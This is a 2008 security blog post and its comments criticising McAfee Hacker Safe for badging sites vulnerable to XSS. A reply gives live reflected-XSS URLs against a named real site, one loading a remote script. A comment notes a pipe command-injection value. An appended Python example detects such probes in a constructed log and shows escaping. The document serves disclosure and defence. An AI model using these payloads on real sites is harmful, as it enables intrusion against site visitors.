Friday, April 25, 2008

Still not Hacker Safe, roll the video

Accuse me of beating a dead horse, but this really ticks me off. While preparing content for my monthly column, as well as presentation content for the ISSA NW Regional Security Conference, I found yet another bunch of McAfee Hacker Safe branded sites that are completely vulnerable to cross-site scripting (XSS), as well as to other issues. The video I took points out only reflected, non-persistent vulnerabilities. No sites were harmed in the making of the video, and all sites have been advised. Nonetheless, let me make my point yet one more time.
1) Sites that are vulnerable to XSS are not PCI compliant. All of the sites in this video take CC payments and store customer information.
2) The sites in this video have been vulnerable for months. Additionally, some have been advised multiple times and have simply ignored my notices. Their McAfee Hacker Safe branding is active and has not been removed at any time.
3) The McAfee Hacker Safe service claims XSS as part of its vulnerability checks; sites that are vulnerable to it should not be showing the McAfee Hacker Safe label in perpetuity.
THEY ARE NOT HACKER SAFE AND CONSUMERS ARE AT RISK.

Please join me in protest by adding a comment to my open letter to Ken Leonard, CEO of Scan Alert. Send them email, ask the sites to fix the issues.
Unknowing consumers deserve far more than false claims of security and empty assurances designed to grow McAfee/ScanAlert revenues.
As I am not the only person greatly concerned over this issue, please visit Rafal Los' fine blog for additional findings.
Enjoy the video.


6 comments:

Wireghoul said...

I suspect that your second URL, the Delaware one, is also trivial to command inject into. From the URL in your address bar before the XSS attempt I noticed:

...phlfares.db%7c%2Fvar%2fwww%2fcgi-bin...

which immediately raised a red flag! It decodes to phlfares.db|/var/www/cgi-bin and suggests that the argument is passed to an open() call!

HackerSafe is very much like Clippy, fancy graphics with no real value.

Anonymous said...

Try and do your research first, this story is almost 2 years old:

http://www.0x000000.com/index.php?i=40

bye, Michal

Russ McRee said...

Michal, thanks for proving my point. I'm not trying to paint this as a new issue, nor one I discovered. The fact that it continues unabated, for 2 years, is a sad indicator of how pathetic the premise of Hacker Safe or Hacker Proof, and now McAfee Secure, really is. These "security" companies must stop driving revenue for themselves and their customers, and take more stringent steps to protect the consumers who believe what they see in a logo.

Peter K said...

Another important point to consider is the price. I mean these guys are very expensive. I actually ended up with a Business Verification seal from Merchant-Safe.com and saw a jump in conversion.

Now I got another call from Hacker Safe regarding scanning and I started browsing and found this article..

I agree with the previous comment, these security companies must focus on consumer and website security rather than driving profits up.

I think for small businesses Merchant Safe trust seals are a better and cheaper alternative to Hacker Safe. Because in the end all seal programs can do only so much. At the most a bump in conversion of about 15-20%. It is "your product" that has to sell based on what it has to offer.

Dan G. said...

It's important to note that many people don't use Hacker Safe for security. Having a hacker safe logo on your site helps increase conversion as there is a verification process here. Look at this site Trust the Seller and you will see why it increases sales as well as some other options to McAfee Secure / Hacker Safe.

Russ McRee said...

Dan G,
It's clearly evident that these services, and the businesses they peddle to, have conversions in mind, rather than security, but I believe they are therefore beholden to do something other than the most rudimentary of scans before placing the badge on a site, indicating it is safe. The post you refer to promotes Trust Guard. If we can find security issues in Trust Guard-badged sites, why then should anyone but the clueless believe they are valid or worthy in any way? Who are they protecting, the site operator or the customer? Sadly, we all know it's the site operator's revenue stream they're interested in. Customer be damned.
Here's an example.
Before: https://www.radiantsmile.net/
After:
https://www.radiantsmile.net/order/login.php?go=%22%3E%3Cmarquee%3E%3Ch1%3EThis_site_is_complicit_in_Trust_Guard%27s_fraudulent_conversion_driving_scheme.%3C%2Fh1%3E%3C%2Fmarquee%3E
Or:
https://www.radiantsmile.net/order/login.php?go=%22%3E%3Cscript%20src%3Dhttp%3A//holisticinfosec.org/js/pleasefixme.js%3E%3C/script%3E
Trust Guard's no better than the rest. Just cheaper.
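The two findings on this page, reflected XSS through a `go` parameter on a login page and the `phlfares.db|/var/www/cgi-bin` value Wireghoul spotted in a filename parameter, are the kind of thing a site operator can catch in their own access logs long before a badge vendor's scan does, and the first one is fixed by escaping the value before echoing it. The following script is an added example written for this page; it is not code from the post, the commenters, McAfee or Trust Guard. The log lines, IP addresses, hostnames, script names and the `go` and `table` parameter names are constructed for the example, and the "vulnerable" renderer is a hypothetical reconstruction of the defect class, not the actual login.php.

```python
import html
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access log (Common Log Format). Hosts and paths are
# illustrative; the query strings mirror the shape of the URLs quoted on the page.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Apr/2008:10:01:02 -0700] "GET /order/login.php?go=account HTTP/1.1" 200 512
203.0.113.5 - - [25/Apr/2008:10:01:09 -0700] "GET /order/login.php?go=%22%3E%3Cmarquee%3E%3Ch1%3Ehello%3C%2Fh1%3E%3C%2Fmarquee%3E HTTP/1.1" 200 640
203.0.113.7 - - [25/Apr/2008:10:02:11 -0700] "GET /order/login.php?go=%22%3E%3Cscript%20src%3Dhttp%3A//example.invalid/x.js%3E%3C/script%3E HTTP/1.1" 200 640
198.51.100.9 - - [25/Apr/2008:10:03:30 -0700] "GET /cgi-bin/fares.pl?table=phlfares.db HTTP/1.1" 200 2048
198.51.100.9 - - [25/Apr/2008:10:03:41 -0700] "GET /cgi-bin/fares.pl?table=phlfares.db%7c%2Fvar%2fwww%2fcgi-bin HTTP/1.1" 500 0
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Markup has no business inside a plain navigation parameter.
HTML_MARKUP_RE = re.compile(r'<\s*/?\s*[a-z][a-z0-9]*', re.IGNORECASE)
# Characters that let a value escape a filename context (pipe, path separators, NUL).
FILENAME_META_RE = re.compile(r'[|/\\\x00]')


def parse_line(line):
    """Return (ip, status, path, [(param, decoded_value), ...]) or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl percent-decodes values, so %3C becomes '<' and %7c becomes '|'.
    params = parse_qsl(parts.query, keep_blank_values=True)
    return m.group("ip"), int(m.group("status")), parts.path, params


def classify(param, value):
    """Label one decoded parameter value; None if it looks benign."""
    if HTML_MARKUP_RE.search(value):
        return "reflected-xss-probe"
    # 'table' is the hypothetical filename parameter of the CGI script.
    if param == "table" and FILENAME_META_RE.search(value):
        return "filename-metachar"
    return None


def triage(log_text):
    """Return a list of (ip, path, param, label) for every suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, _status, path, params = parsed
        for param, value in params:
            label = classify(param, value)
            if label:
                findings.append((ip, path, param, label))
    return findings


def render_login_page_unsafe(go):
    """The defect class: the parameter is echoed straight into an attribute value."""
    return '<input type="hidden" name="go" value="%s">' % go


def render_login_page_safe(go):
    """The fix: escape for the HTML attribute context before echoing."""
    return '<input type="hidden" name="go" value="%s">' % html.escape(go, quote=True)


if __name__ == "__main__":
    for ip, path, param, label in triage(SAMPLE_LOG):
        print(f"{ip} {path} {param}={label}")
    probe = '"><script src=http://example.invalid/x.js></script>'
    print(render_login_page_unsafe(probe))
    print(render_login_page_safe(probe))
```

Run against the constructed log, `triage` flags the two `go` requests as reflected-XSS probes and the second `table` request as carrying filename metacharacters, while the benign requests produce nothing. The point of the two renderers is that the same `go` value that breaks out of the attribute in the unsafe version is rendered as inert text by `html.escape`; a scanner that claims to check for XSS only has to request the page with an unusual `go` value and look for its own markup coming back unescaped.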